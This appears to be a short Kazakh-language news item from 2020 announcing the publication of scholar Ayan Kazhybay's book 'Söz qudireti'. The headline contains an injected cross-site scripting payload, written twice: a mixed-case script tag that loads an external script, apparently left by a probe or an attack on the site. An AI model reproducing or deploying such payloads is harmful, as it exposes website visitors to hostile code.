Ғылым көкжиегінде<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

26.05.2020

Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің ұстазы, филология ғылымдарының кандидаты, Қазақстан Педагогикалық Ғылымдар Академиясының корреспондент мүшесі, әдебиетші-ғалым Аян Қажыбайдың «Сөз құдіреті» атты туындысы жарыққа шықты.
Еңбекте республикалық баспасөз беттерінде, ғылыми басылымдарда әр жылдарда жарияланып, оқырмандардың ыстық ықыласына бөленген таңдаулы ғылыми зерттеулері, әдеби сын ой-толғамдары, ғылыми-көпшілік мақалалары және эсселері енген.
«Сөз құдіреті – Величие слова» – бітімі тұтас, тілі құнарлы, танымдық мәні елеулі, ғибраты мол еңбектің жарыққа шығуымен шын жүректен құттықтаймыз!

Просмотров: 576


Пікір қосу



Деректерді қолтаңбаға қосу